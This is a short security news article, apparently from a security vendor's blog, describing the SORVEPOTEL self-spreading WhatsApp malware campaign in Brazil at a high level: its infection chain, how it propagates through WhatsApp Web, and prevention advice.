Self-Spreading New Malware Target WhatsApp Users
Self-spreading WhatsApp malware is attacking users in Brazil, spreading fast through phishing messages with ZIP attachments. Researchers discovered that this campaign, called SORVEPOTEL, aims for speed and reach rather than stealing data or locking systems. However, its quick spread still poses serious risks to users and organizations.
The malware exploits trust in WhatsApp’s desktop platform. Once triggered, it automatically spreads through the victim’s contacts, sending out the same infected file. Therefore, even cautious users may unknowingly pass the malware to others.
How the Attack Works
The attack begins with a phishing message sent from a compromised contact. The message appears genuine, often claiming to include a receipt or health-related file. However, the ZIP file it contains hides a dangerous payload.
Once opened, the user is tricked into launching a Windows shortcut file. This file silently runs a PowerShell script that downloads the main malware from an external server. Consequently, the malware installs itself in the Windows Startup folder to ensure it runs every time the system starts.
After installation, it connects to a command-and-control server for further instructions. Therefore, the attacker can update the malware or spread additional harmful files without direct user action.
Rapid Propagation Through WhatsApp Web
If the infected device has WhatsApp Web active, the malware immediately sends the malicious ZIP file to all contacts and groups. This automated process enables rapid, large-scale infection with minimal effort from the attacker.
Because of this excessive spam, many infected accounts end up banned by WhatsApp for violating its terms of service. Researchers note that most infections 457 out of 477 reported, occurred in Brazil. The attacks have hit government, technology, and education sectors the hardest.
Broader Implications and Trends
This campaign highlights a growing trend: cybercriminals are increasingly using trusted communication platforms to spread malware quickly. Since users often believe messages from familiar contacts, phishing campaigns through chat apps can be highly effective.
Therefore, experts warn that individuals and companies must strengthen their digital hygiene. Regular awareness training and technical safeguards are essential to block such threats.
Preventing Future Attacks
To prevent infections like SORVEPOTEL, users should avoid opening ZIP attachments from unknown or unexpected sources. Organizations can enhance protection by using managed threat monitoring and endpoint security services. These tools can detect suspicious file behavior and block malicious links before they reach users.
Regular system updates, phishing simulations, and automated malware scanning can further reduce the risk of infection. Therefore, proactive defense and real-time monitoring are key to keeping networks safe from fast-spreading threats like this one.
Sleep well, we got you covered.
